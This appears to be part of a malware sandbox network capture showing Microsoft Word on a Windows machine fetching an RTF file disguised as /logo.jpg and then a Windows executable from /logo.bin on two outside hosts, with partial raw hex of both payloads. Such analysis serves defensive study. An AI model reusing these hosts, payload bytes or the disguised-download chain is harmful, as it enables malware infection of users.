                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Mai 25, 2018 16:04:14.912440062 MESZ6OUTOPTIONS /wordpress/ HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:04:14.987792015 MESZ7INHTTP/1.1 403 Forbidden
                Date: Fri, 25 May 2018 14:04:14 GMT
                Server: Apache
                Content-Length: 338
                Keep-Alive: timeout=5, max=96
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Mai 25, 2018 16:04:14.989383936 MESZ7OUTOPTIONS /wordpress/ HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:04:15.065145969 MESZ8INHTTP/1.1 403 Forbidden
                Date: Fri, 25 May 2018 14:04:15 GMT
                Server: Apache
                Content-Length: 338
                Keep-Alive: timeout=5, max=95
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Mai 25, 2018 16:04:15.266997099 MESZ8INHTTP/1.1 403 Forbidden
                Date: Fri, 25 May 2018 14:04:15 GMT
                Server: Apache
                Content-Length: 338
                Keep-Alive: timeout=5, max=95
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.1.164919187.247.241.14380C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampkBytes transferredDirectionData
                Mai 25, 2018 16:04:15.348134995 MESZ9OUTGET /logo.jpg HTTP/1.1
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                Accept-Encoding: gzip, deflate
                Host: cypruscars4u.com
                Connection: Keep-Alive
                Mai 25, 2018 16:04:15.444607019 MESZ10INHTTP/1.1 200 OK
                Date: Fri, 25 May 2018 14:04:15 GMT
                Server: Apache
                Last-Modified: Fri, 25 May 2018 10:39:39 GMT
                Accept-Ranges: bytes
                Content-Length: 55287
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: image/jpeg
                Data Raw: 7b 5c 72 74 66 31 7b 5c 70 69 63 74 5c 6a 70 65 67 62 6c 69 70 5c 70 69 63 77 32 34 5c 70 69 63 68 32 34 5c 62 69 6e 31 35 35 35 30 20 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 01 20 01 cc 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 01 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 07 06 05 03 04 08 02 01 ff c4 00 57 10 00 01 03 03 02 03 04 04 06 0e 06 05 0a 07 00 00 01 00 02 03 04 05 11 06 21 07 12 31 13 41 51 61 22 71 81 91 14 32 36 74 a1 b2 15 23 42 52 62 72 73 82 92 a2 b1 b3 c1 d1 16 24 33 34 55 c2 17 35 45 54 d2 25 26 43 63 83 93 94 a3 e1 f0 37 44 53 64 84 a4 e2 ff c4 00 1a 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 01 06 ff c4 00 38 11 00 02 02 02 00 04 03 05 06 05 04 03 01 00 00 00 00 01 02 03 04 11 05 12 21 31 13 41 51 22 32 61 81 f0 14 71 91 a1 b1 d1 33 34 c1 e1 f1 15 23 24 42 35 43 44 82 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 bf a2 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 fc 49 23 21 89 f2 ca f6 b2 36 02 e7 3d c7 01 a0 75 24 f7 04 07 ed 16 02 f9 c5 3b 6d 0b 9d 0d aa 17 5c 25 19 1d ae 79 22 07 c8 f5 77 b0 60 f8 ac 15 cf 5f ea 3b 89 77 3d c8 d2 46 7a 32 94 76 40 7e 77 c6 fa 55 b1 a6 4c e7 5d c4 e8 a9 e9 3d bf 81 7b 73 9a c6 97 38 80 07 52 4a f5 8d ca 84 3b 94 d6 d3 03 e1 da b7 3f b5 7c f2 cb 5d ea ee 7b 76 50 5c 6b 79 bf e9 4c 4f 90 1f ce 2b db 1a 23 51 39 bc c2 c5 51 8f 36 b4 1f 76 54 fc 14 bb c8 cf fe a9 64 bd ca 9f d7 c8 fa 0a 39 63 95 bc d1 bd af 6f 8b 4e 57 ed 7c e3 2e 9c be 50 93 23 ec f7 08 79 77 e7 6c 0e c0 f6 b5 7b 36 fd 65 a8 6d af c5 3d de a1 c0 6c 63 a8 77 6a 3d 58 76 48 f6 61 3c 0f 46 17 17 49 ea c8 35 f5 f2 3e 85 45 32 b2 f1 66 37 b9 b1 5e e8 fb 1c 9c 7c 22 94 17 34 7a d8 77 03 d4 4f a9 51 28 6b e9 2e 74 ac aa a1 a9 8a a2 07 f4 7c 6e c8 f5 79 1f 25 4c a1 28 f7 3a 34 65 55 7a dd 6f 67 b2 88 8a 26 80 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 8b 9d 7b bc d2
                Data Ascii: {\rtf1{\pict\jpegblip\picw24\pich24\bin15550 JFIFHHDuckydC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222 "W!1AQa"q26t#BRbrs$34U5ET%&Cc7DSd8!1AQ"2aq34#$B5CD?"" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """I#!6=u$;m\%y"w`_;w=Fz2v@~wUL]={s8RJ;?|]{vP\kyLO+#Q9Q6vTd9coNW|.P#ywl{6em=lcwj=XvHa<FI5>E2f7^|"4zwOQ(k.t|ny%L(:4eUzog&" """ """ """ """ """ {
                Mai 25, 2018 16:04:15.444644928 MESZ12INData Raw: 58 2d 53 5c 2b 5f 88 e3 18 6b 47 c6 91 c7 a3 5b e6 7f f5 e8 11 2d 9e 4a 4a 2b 6f b1 e3 bf 6a 0b 7e 9c a0 35 75 f2 10 09 c4 71 33 77 c8 ef 06 8f fd 81 de a2 5a 8f 56 5d 35 45 40 6d 43 8c 74 bc ff 00 6a a3 88 92 dc f7 67 bd ee ff 00 d8 01 7a f7 1b
                Data Ascii: X-S\+_kG[-JJ+oj~5uq3wZV]5E@mCtjgzVcG>UoGZM8UTwYw7S6ZRKoqW1{#)!hg<nOiV;'+[m ><EL:0{+EI,j9F>fs47
                Mai 25, 2018 16:04:15.444658995 MESZ12INData Raw: 92 56 f7 b9 b9 dc 63 bc 1f 2d ce f8 fd 71 16 f5 71 b1 58 69 aa 6d 95 1d 84 cf ab 6c 6e 77 23 5f 96 96 3c e3 0e 07 bc 05 0e 47 cd ca 6b fb 55 6e 97 72 ea 8d 7a 28 7c 1c 50 d4 74 f4 b2 c7 2c f4 d3 ca f2 39 26 96 20 0c 63 1b 80 1b 80 7b ba af 45 fc
                Data Ascii: Vc-qqXimlnw#_<GkUnrz(|Pt,9& c{E@pyca$b|^m&_Kt~182:4x`216)q>f?;#u.Vl.jvN).zhkZi!s;78a#pi'{sn_jS;up'bnK
                Mai 25, 2018 16:04:15.445514917 MESZ14INData Raw: b7 cd 4d 0b 65 67 35 25 18 13 ca 08 c8 76 0f a2 d3 eb 3b e0 f5 0d 2a da 52 49 cd 98 78 95 92 b2 71 c6 87 77 dc a0 70 ef 48 8b 35 bc 5d 2b 63 22 e3 54 cd 9a e1 bc 11 9e 8d f5 9d 89 f6 0e ed f7 28 b9 77 fb f5 1e 9c b5 ba e1 5a 24 74 61 cd 63 59 13
                Data Ascii: Meg5%v;*RIxqwpH5]+c"T(wZ$tacYr8T-^=\GQMYgu%`wH]=2HdktPI3j!918ZG7/1v,U6FRb ypEl-vx gl"h
                Mai 25, 2018 16:04:15.447355986 MESZ15INData Raw: c7 ec 9e 8e b6 ce e3 99 19 17 62 fd f2 79 99 e8 e4 fa f1 9f 6a 8e ea aa 89 2f ba da bf b0 1c cf 96 a8 52 c2 01 ce 70 44 63 1e b2 33 ed 5a 6e 1e 6a 11 6b d3 9a 82 37 b9 b9 a4 8c d6 44 d7 7d d1 2d e5 23 de d6 fe 92 e1 70 f2 dc 6e 1a ce 8b 9c 73 b2
                Data Ascii: byj/RpDc3Znjk7D}-#pns:L`sJcSRt@(F!e0x8p[~N&Yc?]eiq}|~LV{".&_JUEyBR..6wU"g}e}iKr6A*]/;
                Mai 25, 2018 16:04:15.447390079 MESZ17INData Raw: 24 dd 7c bc ad 92 70 cc f1 dd d0 86 9b 3c fc 5d af 32 5c ed d6 e1 9e 58 a2 74 ee df a9 71 e5 1e e0 d7 7b d7 7f 85 56 d1 4b a6 24 ae 73 47 69 5b 33 9c 1d f8 0c f4 40 f7 87 1f 6a c1 f1 1e 67 49 ae ab c3 8e 44 4c 89 8d f2 1c 81 df b5 c5 57 74 95 3b
                Data Ascii: $|p<]2\Xtq{VK$sGi[3@jgIDLWt;it}&FsCJ}*HL&Z0GZ7%EnWOUAg=sC6pz@0F*[NHs^IDT|vkcd1v\H;7s_HF
                Mai 25, 2018 16:04:15.447398901 MESZ17INData Raw: 03 d8 ba fa 57 4e 3b 4c 5b a5 a1 15 f2 55 c2 e9 4c 8c e7 60 6f 26
                Data Ascii: WN;L[UL`o&
                Mai 25, 2018 16:04:15.456495047 MESZ18INData Raw: 46 e0 60 f4 ce fe d2 ad 9d 8a 49 35 dd 1c fc 5c 3b 6a 9c eb 92 f6 24 45 b4 cd fa 6d 31 7d 65 70 89 cf 68 0e 86 78 4f a2 e2 d2 77 1b f4 20 80 7d 98 55 98 38 97 a5 a5 85 af 92 ba 48 1c 7a c7 25 3c 9c c3 f4 41 1e e2 bf 7a 8b 40 5a 35 04 ee aa 3d a5
                Data Ascii: F`I5\;j$Em1}ephxOw }U8Hz%<Az@Z5=%c4c?|\zNm\Ytd*7p)GS8^L4W8r*yn54SRX"i ~Bf,&I}vmeip BOW4Jhc,c.?GRa
                Mai 25, 2018 16:04:15.456512928 MESZ20INData Raw: d0 52 98 6d 06 06 5a e5 a7 7c ae 9e 9d d2 b1 cf 6c 9e 8f 69 cd 90 72 e1 8c 1e 5c 3b 7e fc 77 ee 1a da 7a fd 0d 0d ee 18 1d 05 45 3d c1 90 d4 d3 f3 7a 12 63 e3 30 ed f1 5c d2 3a 8d 8f 8e 16 22 ba b7 4c d7 6a 8a 6b 93 6d 55 30 da dd 18 92 a6 92 38
                Data Ascii: RmZ|lir\;~wzE=zc0\:"LjkmU089.9qif_\~m9;Hw$x8s4}b.6CCKCPYH81v$4G{XZj}v2'NI7CijfcCji[qG$!mr2
                Mai 25, 2018 16:04:15.456527948 MESZ20INData Raw: 8d e4 04 0c 00 00 ea 06 e7 73 d7 f5 a4 26 b6 dd b8 87 03 ad 16 f6 51 50 50 52 48 e8 9b ca 04 92 12 43 4b 9e 77 24 fa 5b 64 9c 01 e6 b0 d5 90 dc 6b 6b ea 6a df 6e a8 63 e7 95 f2 b9 ac a7 78 6b 4b 89 38 1b 74 dd 54 b8 5a ca 56 da 2a 19 f6 32 4a 5b
                Data Ascii: s&QPPRHCKw$[dkkjncxkK8tTZV*2J[Oy16zvl$s~<Hf;V0ws{B(>m$(H;8&UQ9Y_ZAa.w;=?b,=z-=mJ/-4p
                Mai 25, 2018 16:04:15.457494020 MESZ21INData Raw: 77 78 e6 ef c7 8a 84 a0 e3 dc d3 56 4d 57 36 ab 7b d1 9b e2 25 d1 f6 bd 1d 55 d9 38 b6 5a a2 29 9a 47 77 37 c6 fd 50 e5 28 d1 76 48 ef da a2 9a 8e 66 73 52 c6 0c d3 b4 77 b1 b8 db d4 49 68 3e 44 ad e7 17 a4 22 cb 6d 8f 7e 57 55 17 1f 63 1d fc d7
                Data Ascii: wxVMW6{%U8Z)Gw7P(vHfsRwIh>D"m~WUcRQ{^Cr2%k,cX45e;KNUm401HvFS{_iURsg-h=].,|W,~T|v8bt,Gj.>7
                Mai 25, 2018 16:04:15.546453953 MESZ67OUTHEAD /logo.jpg HTTP/1.1
                User-Agent: Microsoft Office Existence Discovery
                Host: cypruscars4u.com
                Content-Length: 0
                Connection: Keep-Alive
                Mai 25, 2018 16:04:15.652585030 MESZ67INHTTP/1.1 200 OK
                Date: Fri, 25 May 2018 14:04:15 GMT
                Server: Apache
                Last-Modified: Fri, 25 May 2018 10:39:39 GMT
                Accept-Ranges: bytes
                Content-Length: 55287
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: image/jpeg


                Session IDSource IPSource PortDestination IPDestination PortProcess
                4192.168.1.164919287.247.241.14380C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampkBytes transferredDirectionData
                Mai 25, 2018 16:05:03.047264099 MESZ68OUTGET /logo.bin HTTP/1.1
                Host: figs4u.co.uk
                Connection: Keep-Alive
                Mai 25, 2018 16:05:03.129065990 MESZ70INHTTP/1.1 200 OK
                Date: Fri, 25 May 2018 14:05:03 GMT
                Server: Apache
                Last-Modified: Fri, 25 May 2018 10:33:56 GMT
                Accept-Ranges: bytes
                Content-Length: 270387
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/octet-stream
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 00 7b de 79 61 15 8d 79 61 15 8d 79 61 15 8d fa 7d 1b 8d 78 61 15 8d 10 7e 1c 8d 7e 61 15 8d 90 7e 18 8d 78 61 15 8d 52 69 63 68 79 61 15 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 c2 07 5b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 01 00 00 b0 02 00 00 00 00 00 e4 16 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 04 00 00 10 00 00 51 4b 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 65 01 00 28 00 00 00 00 a0 01 00 f4 9e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 5c 01 00 00 10 00 00 00 60 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 80 29 00 00 00 70 01 00 00 10 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 9e 02 00 00 a0 01 00 00 a0 02 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 6c da 5b 4a 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$={yayaya}xa~~a~xaRichyaPEL$[`p@@QKe(8 .text\` `.data)pp@.rsrc@@l[JMSVBVM60.DLL
                Mai 25, 2018 16:05:03.129085064 MESZ71INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
                Mai 25, 2018 16:05:03.129091024 MESZ72INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
                Mai 25, 2018 16:05:03.129548073 MESZ73INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
